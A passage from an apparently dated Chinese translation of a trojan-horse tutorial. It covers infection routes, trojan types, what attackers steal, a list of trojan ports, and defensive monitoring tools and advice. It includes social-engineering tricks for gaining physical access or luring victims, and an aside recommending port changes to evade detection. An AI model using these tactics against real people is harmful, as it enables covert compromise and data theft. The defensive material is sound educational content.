務器的密碼或別的什麼東西.用木馬感染某人最好的方法是向伺服器投遞大量的EMAIL,因為在網上有很多新
手,他們當然會受感染.這是最好的感染辦法--如我所說:為什麼它是想感染大眾的人的首選方法.
6.4 物理訪問
當你的」朋友「可以物理訪問你的計算機的時候,你當然會被感染.讓我們假定你丟下某人在你
的電腦旁5分鍾,那麼你當然會被你的"朋友「中的某人感染.有一些非常精明的人,時刻想著物理訪問某人
的電腦的新方法,下面是一些有趣的詭計:
1.你的」朋友「可能請你」嗨兄弟,能給我一點水嗎?「或其他的可以讓他單獨呆著的事情,你會去取
點水,接著..你知道會發生什麼.
2.攻擊者可能有一個計劃.比方你邀請他(她)12:00在你的家裡,他會叫你的一個」朋友「在12:15給
你打電話和你談一些事情,攻擊者又有時間感染你了.也可以是:給你打電話的」朋友「說一些如」有人
在你身邊嗎?如果有的話,不如移到其他地方,我不想讓任何人聽到我們的談話「,這樣,攻擊者又單獨
呆著有時間感染你了.
6.5 詭計
這是一個對真想要些什麼的人起作用的詭計,當然攻擊者知道它是什麼.比方說受害人想看色情作品
或***密碼,那麼,攻擊者會在受害人屋子前留下一個含有木馬的軟磁碟,當然會將木馬和XXX圖片放在
一起.這是一個壞事情,因為有時候你真的想要某些東西,並且最後發現了它.
7.木馬會有多危險?
許多不知道木馬是什麼的人認為當他們運行一個可執行文件的時候什麼都沒有發生,因為他們的電腦仍
舊還在工作,所有的數據都還在.如果上病毒的話,他們的數據將被毀壞,電腦將不再工作.
有人正在你的電腦上上傳和下載文件;有人正讀你所的IRC日誌,了解你和你朋友的有趣的事情;有人
正讀你的所有的ICQ消息;有人正刪除你電腦上的文件....
這是一些顯示木馬有多危險的例子.人們只是在被感染的機器上用木馬代替如CIH一樣的病毒,然後毀壞機器.
8.不同種類的木馬
--遠程式控制制型木馬:
這是現在最流行的木馬.每個人都想有這樣的木馬,因為他們想訪問受害人的硬碟.RAT'S (remote access
trojans)使用起來非常簡單,只需要某人運行伺服器,你得到受害人的IP,你對他或她的計算機有完全的訪問
權.你能做一些事情,它依賴於你使用的木馬.但是,RAT'S有通常的遠程式控制制木馬的功能如:KERLOGGER,上傳
和下載,MAKE A SCREEN SHOT等等.有人將木馬用於惡意的目的,他們只是想刪除又刪除....
這是LAME.但是我有一個關於使用木馬最好方法的指南,你應該讀它.有很多用於檢測最常用木馬的程序,
但是新木馬每天都出現,這些程序不是最好的防禦.木馬總是做同樣的事情.如果每次WINDOWS重新啟動的時候,
木馬重啟,這意味著它放了什麼東西在注冊表或WIN.INI或其他的系統文件里,因此它能重啟.木馬也可能在
WINDOWS系統目錄里生成一些文件,這些文件總是看起來象一些受害人認為是正常的WINDOWS可執行文件.絕大
多數木馬隱瞞任務表Most trojans hide from the Alt+Ctrl+Del menu,有人只用ALT+CTRL+DEL來看哪些進
程正在運行,這是不好的.有程序會正確地告訴你進程和文件來自哪兒,但是有一些木馬(正如我跟你所說)
使用偽造的名字,對有些人來說,要決定哪個進程應該殺死是有一點困難的.
遠程式控制制木馬打開一個埠讓每一個人都可以連上你的電腦.有些木馬有些選項象改變埠和設置密碼以
使只有那個感染你的傢伙可以使用你的電腦.改變埠選項是非常好的,因為我確信你不想讓你的受害人看見
他的電腦上的埠31377是開著的.遠程式控制制木馬每天都在出現,而且將繼續出現對那些使用這樣的木馬的人:
小心感染你自己,那麼那些你想毀滅的受害人將會報復,你將會感到難過.
--發送密碼型木馬:
這些木馬的目的是得到所有緩存的密碼然後將他們送到特定的EMAIL地址,不不讓受害者知道 e-mail.絕大
多數這種木馬在WINDOWS每次載入的時候不重啟,他們使用埠25發送郵件.也有一些木馬發送其他的信息如
ICQ,計算機信息等等.如果你有任何密碼緩存在你電腦的任何地方,這些木馬對你是危險的.
--Keyloggers:
這些木馬是非常簡單的,他們做的唯一的事情就是記錄受害人在鍵盤上的敲擊,然後在日誌文件中檢查
密碼.在大多數情況下,這些木馬在WINDOWS每次載入的時候重啟,他們有象在線和下線的選項,當用在線選
項的時候,他們知道受害人在線,會記錄每一件事情.然而,當用下線選項的時候,WINDOWS開始後被寫下的
每一件事情會被記錄並保存在受害人的硬碟等待傳送.
--破壞型木馬:
這種木馬的唯一功能是毀壞和刪除文件,使得他們非常簡單易用.他們能自動刪除你計算機上所有的DLL,
EXE,INI文件.這是非常危險的木馬,一旦你被感染,毫無疑問,如果你沒有清除,你的計算機信息將不再存在.
--FTP型木馬:
這種木馬在你的電腦上打開埠21,讓任何有FTP客戶軟體的人都可以不用密碼連上你的電腦並自由上傳和
下載.這些是最常用的木馬,他們都是危險的,你應該小心使用他們.
9.誰會感染你?
基本上,你會被每個知道會如何使用木馬(這非常簡單)當然知道怎麼感染你的人感染.使用木馬的人是僅
僅停留在使用木馬階段的黑客,他們中的一些人不會走到下一個階段,他們是只能使用木馬(正如我所說這非
常簡單)的LAMERS,但是,讀了這篇文章後,你將知道別人用木馬感染你的最常用方法,它將使那些想用木馬
感染你的人感到困難.
10.攻擊者要找什麼?
你們中的一些人可能認為木馬只用來搞破壞,他們也能用來刺探某人的機器,從裡面取走很多私人信息.
攻擊者取的信息將包括但不限於下列常用數據:
----信用卡信息
----信貸信息
----常用帳號信息
----任何帳號數據
----資料庫
----郵件列表
----私人地址
----EMAIL地址
----帳號密碼
----個人簡歷
----EMAIL信息
----計算機帳號或服務訂閱信息
----你或你的配偶的姓名
----子女的姓名年齡
----你們的地址
----你們的電話號碼
----你寫給別人的信
----你家庭的照片
----學校作業
----任何學校的帳號信息
11.木馬如何工作?
在這兒我會向你解釋木馬是如何工作的,如果你有些單詞不了解,你可以查閱「文章中常用術語」部分.
當受害人運行木馬伺服器的時候,它確實在做些什麼,如打開某個特定埠監聽連接,它可以使用TCP或UDP
協議.當你連上受害人的IP地址時,你可以做你想做的事,因為你放了木馬的計算機上的伺服器讓你這么做.
一些木馬每次在WINDOWS被載入的時候重啟,他們修改WIN.INI或SYSTEM.INI,因此他們可以重啟,但是大多
數新木馬使用注冊表完成相應功能.木馬象客戶和伺服器一樣相互通信,受害人運行伺服器,攻擊者使用客戶
向伺服器發送命令,伺服器只是按客戶說的去做.
12.最常用木馬埠
這兒有最常用的木馬埠列表:
Satanz Backdoor|666
Silencer|1001
Shivka-Burka|1600
SpySender|1807
Shockrave|1981
WebEx|1001
Doly Trojan|1011
Psyber Stream Server|1170
Ultors Trojan|1234
VooDoo Doll|1245
FTP99CMP|1492
BackDoor|1999
Trojan Cow|2001
Ripper|2023
Bugs|2115
Deep Throat|2140
The Invasor|2140
Phineas Phucker|2801
Masters Paradise|30129
Portal of Doom|3700
WinCrash|4092
ICQTrojan|4590
Sockets de Troie|5000
Sockets de Troie 1.x|5001
Firehotcker|5321
Blade Runner|5400
Blade Runner 1.x|5401
Blade Runner 2.x|5402
Robo-Hack|5569
DeepThroat|6670
DeepThroat|6771
GateCrasher|6969
Priority|6969
Remote Grab|7000
NetMonitor|7300
NetMonitor 1.x|7301
NetMonitor 2.x|7306
NetMonitor 3.x|7307
NetMonitor 4.x|7308
ICKiller|7789
Portal of Doom|9872
Portal of Doom 1.x|9873
Portal of Doom 2.x|9874
Portal of Doom 3.x|9875
Portal of Doom 4.x|10067
Portal of Doom 5.x|10167
iNi-Killer|9989
Senna Spy|11000
Progenic trojan|11223
Hack?99 KeyLogger|12223
GabanBus|1245
NetBus|1245
Whack-a-mole|12361
Whack-a-mole 1.x|12362
Priority|16969
Millennium|20001
NetBus 2 Pro|20034
GirlFriend|21544
Prosiak|22222
Prosiak|33333
Evil FTP|23456
Ugly FTP|23456
Delta|26274
Back Orifice|31337
Back Orifice|31338
DeepBO|31338
NetSpy DK|31339
BOWhack|31666
BigGluck|34324
The Spy|40412
Masters Paradise|40421
Masters Paradise 1.x|40422
Masters Paradise 2.x|40423
Masters Paradise 3.x|40426
Sockets de Troie|50505
Fore|50766
Remote Windows Shutdown|53001
Telecommando|61466
Devil|65000
The tHing|6400
NetBus 1.x|12346
NetBus Pro 20034
SubSeven|1243
NetSphere|30100
Silencer |1001
Millenium |20000
Devil 1.03 |65000
NetMonitor| 7306
Streaming Audio Trojan| 1170
Socket23 |30303
Gatecrasher |6969
Telecommando | 61466
Gjamer |12076
IcqTrojen| 4950
Priotrity |16969
Vodoo | 1245
Wincrash | 5742
Wincrash2| 2583
Netspy |1033
ShockRave | 1981
Stealth Spy |555
Pass Ripper |2023
Attack FTP |666
GirlFriend | 21554
Fore, Schwindler| 50766
Tiny Telnet Server| 34324
Kuang |30999
Senna Spy Trojans| 11000
WhackJob | 23456
Phase0 | 555
BladeRunner | 5400
IcqTrojan | 4950
InIkiller | 9989
PortalOfDoom | 9872
ProgenicTrojan | 11223
Prosiak 0.47 | 22222
RemoteWindowsShutdown | 53001
RoboHack |5569
Silencer | 1001
Striker | 2565
TheSpy | 40412
TrojanCow | 2001
UglyFtp | 23456
WebEx |1001
Backdoor | 1999
Phineas | 2801
Psyber Streaming Server | 1509
Indoctrination | 6939
Hackers Paradise | 456
Doly Trojan | 1011
FTP99CMP | 1492
Shiva Burka | 1600
Remote Windows Shutdown | 53001
BigGluck, | 34324
NetSpy DK | 31339
Hack?99 KeyLogger | 12223
iNi-Killer | 9989
ICQKiller | 7789
Portal of Doom | 9875
Firehotcker | 5321
Master Paradise |40423
BO jammerkillahV | 121
13.不用掃描器如何監視自己的計算機?
大眾認為當他們有木馬和防病毒掃描器時他們就是安全的,最好的檢測木馬的方法是自己動手,你不能
確信木馬掃描器是否正確地工作因此開始自己檢測.在這篇文章里我已經包含了軟體和課程評論的列表,它
們將有助於你自己檢測你的機器是否有木馬.你總需要檢測你的系統看什麼埠開著,如果你看到有一個常用
木馬埠開著,你很可能已經感染了木馬.
**註解**
你可以在DOS方式下使用NETSTAT或用其他的軟體做這件事.
**註解**
總是注意你的電腦上有什麼文件在運行,檢查它裡面的一些可疑的東西如它的名字.我想你會檢測象
config.EXE,himem.exe,winlilo.exe或其他一些有趣的文件,Hex Edit them,如果你發現一些有趣的東西
如SchoolBus Server,立刻殺死他們.確信你在監視注冊表並時刻檢查它裡面新的變動,確信你在監視
system.ini或win.ini,因為仍舊有很多木馬從它們重啟.正如我告訴你的下載一些廣為人知的程序如ICQ或
MIRC總要從其官方主頁下載.遵循這些簡單的規則將有助於防止你的電腦感染上木馬.
14.幫助你監視自己的電腦的軟體
正如我告訴你的我已經包含了可以幫助你監視自己的計算機防止木馬感染的軟體的列表.
++++++++++++++++
----LogMonitor+
++++++++++++++++
文件和目錄監視工具
Version: 1.3.4
Home page: http://www.geocities.com/koenigvad/Eng/
Author: Vadim Dumbravanu, [email protected]
Log Monitor是一個文件和目錄監視工具,它定期檢查選定文件的修改時間,運行外部程序看是否文件已被
改變.對目錄而言,它處理象文件改動,添加或刪除.
平台:Windows 95/98/NT
自由供個人和商業使用,看LICENSE.TXT得到版權信息.文件包含下列主題:
--1.目的
--2.用法
--3.特性
--4.安裝
--5.反安裝
1.目的
程序的目的是讓不同的管理員使用自動處理程序.有時候這些自動處理程序會停止工作甚至異常終止,處理
程序生成或更新錯誤的日誌文件.Log Monitor會由他們的日誌文件監視這樣的處理程序,向管理員發出問題警告.
2.用法
絕大多數處理程序跟蹤日誌文件,定期更新他們.因此,如果這些處理程序異常終止,日誌文件停止改變.如果
處理程序在選定的時段沒有更新日誌文件,Log Monitor會運行一個外部程序,可能是net send bla bla bla或內
存分頁程序或進程重啟.如果文件也被改變,Log Monitor會運行一個程序,因此你可以檢查文件是否改變.Log
Monitor也可以監視目錄並處理目錄下的文件的變化,添加和刪除.Log Monitor也被用做一個任務調度程序,如果
你想比如每個小時運行一次任務,NT Scheler Service是不符合要求的.使用Log Monitor你可以添加根本不存在
的文件,接著選定3600秒的時間段和程序,只要文件不更新,選定的程序將每個小時運行一次.在程序被啟動
之前你可以定義運行時間和日期.
3.特性
好幾個文件或目錄可以同時被監視,每個文件有自己的時間,由獨立的線程處理.監視進程的列表存儲在配
置文件里.可以最小化到System Tray,也可以恢復.
有暫停監視選定文件的能力,「暫停」狀態也可以存儲在配置文件里.
依調度工作,可以只在選定的每周每月的時間間隔內檢查文件和目錄.
其他很多很好的特性...
++++++++++++
----PrcView+
++++++++++++
PrcView是一個可以顯示廣泛的現運行進程信息的免費進程查看工具,這些信息包括這樣的細節:生成時間,
版本,選定進程使用的DLL文件的全路徑,所有線程的列表,內存塊和堆.PrcView也允許你殺死或附帶一個調試
器到選定的進程,PrcView既可在WINDOWS 95/98也可在WINDOWS NT平台運行,程序包括窗口和命令行兩個版本.
PrcView可以以帶有最初的版權條款的壓縮包形式並遵循非商業原則自由免費分發.
該程序由商業組織向第三方的分發和基於該 程序的工作必須經作者允許.如果你在運行該程序的時候遇到問題請
訪問www.teamcti.com以獲得最新版本,如果仍有問題,請發送一個簡短的描述給[email protected]
----XNetStat
XNetStat是一個和DOS提示符下的NETSTAT一樣的程序,該程序顯示你計算機上所有打開的埠和已經建立的
連接,如果你需要或有任何疑問請MAIL:[email protected]
++++++++++++
----AtGuard+
++++++++++++
AtGuard是一個有很酷特性的防火牆軟體.它也能顯示你的計算機中的哪個文件打開了一個向外的連接,如果
你想檢測電腦上的木馬,這是非常有用的.我丟失了該程序的URL,但是,你可以試著在altavista.com或
packetstorm.securify.com搜索一下.
+++++++++++++++++++++++++
-----ConSeal PC FIREWALL+
+++++++++++++++++++++++++
這款軟體使你的PC更安全,相比其他基於PC的防火牆,它有一些超過它們的主要優勢.在Windows 95,
Windows 98 and Windows NT(3.51 & 4.0)上,它都可以使用.對WINDOWS機器,它可能是最好的防火牆,會
幫助你堵住你機器上的木馬埠,也能抵禦各種DOS攻擊.
+++++++++++++++++
----LockDown2000+
+++++++++++++++++
這真是一個好的可以檢測許多木馬的工具包,它也作為防火牆可以保護你免受NUKE和ICQ攻擊,還可以阻
止文件共享以使你不再有這方面的問題.它定期更新,加入很多新的木馬定義.你想免受攻擊和木馬感染的話,
你必須擁有它.你可以在 www.lockdown2000.com處獲得.
++++++++++
----TDS-2+
++++++++++
TDS(Trojan Defence Suite)也是一個有很多功能和插件的反木馬工具包,它也幾乎檢測所有木馬並定
期更新.如果你想免受攻擊和木馬感染,這也是必須有的一個工具.你可以在www.tds.diamondcs.com.au處獲得.
使用所有課程中提到到反木馬工具包,將會構建一個安全的反木馬的WINDOWS機器.
15.在程序中設置後門
使用木馬感染別人的人正變得更聰明了,他們開始將木馬設在一些每個人都使用的真實程序裡面,因此,
他們可以感染受害者.絕大多數人知道當他們運行一個木馬程序的時候,沒有什麼事情發生或出錯信息出現,
但是,當木馬被設進其他的程序的時候,這些程序正常工作,沒有任何出錯信息,受害者會認為他(她)沒
有被感染.這是不正確的.程序員會把兩個或更多的可執行部分合成一個生成程序,因此,他們可以將木馬設
在一些每個人都知道的程序里.這些開放源代碼的廣為人知的程序也是危險的.好的程序員可以修改源代碼使
它象一個木馬,比方說,你正在使用被修改過的郵件客戶.人所共知,發送密碼型木馬會使用埠25發送一些
包含有信息的郵件.想像如果攻擊者修改了你的郵件客戶把你的郵箱密碼發送給他(她)會怎樣.當然,你會
看見(如果你正在監視的話)埠25正開著,但是,很可能你不會注意,因為你正在發送郵件(正常情況下
發郵件時埠25開著),正如我所說,人們正變得越來越聰明.
16.建議
我的一些建議將幫助你免受木馬或病毒感染:
-1.從不接收文件,即使來自你的朋友.你永遠也不能確定電腦的另一端是誰.
-2.當執行文件的時候,首先檢查它的類型,因為有些人可能設詭計讓你運行它.
-3.總是監視你計算機上的開放埠和運行的文件.
-4.只從官方主頁下載軟體
-5.當玩木馬的時候,你可能感染自己,因為木馬創造者有時將木馬伺服器放在客戶里,因此當你運行客戶的
時候,你也被感染了.這又一次向你顯示木馬是很危險的,一旦你犯了錯誤,你會丟失一些敏感數據.
-6.變得paranoid會更安全.人們總是嘲笑那些燒掉他們每張紙片的人,他們將所有的密碼放在頭腦里,並使
用加密,不用ICQ或IRC,因為他們知道這些協議是多麼脆弱.
17.最後的話
文章到這里就沒了,不久我將更新它.BTW,這是我的最大的也是寫得最好的文章,我真的很喜歡它,我也希
望它將幫助那些想知道如何保護自己免受木馬感染和想學更多有關知識的人們.這又是一篇安全相關的教程,正
如我以前所說我現在開始寫這樣的文章了.你可以查閱我的雜志:blackcode.com/bc-tech/magazine.php3
這篇指南出與教育目的,對讀了這篇文章之後發生的任何事情,我不會承擔任何責任.我只是告訴你如何做
而不是叫你做,那是你的決定.如果你想把這篇文章放在你的站點或FTP或新聞組或其他的任何地方,你可以這
樣做,但是,沒有作者的允許不要改變任何東西.看到這篇文章出現在其他的頁面上,我將會感到很幸福.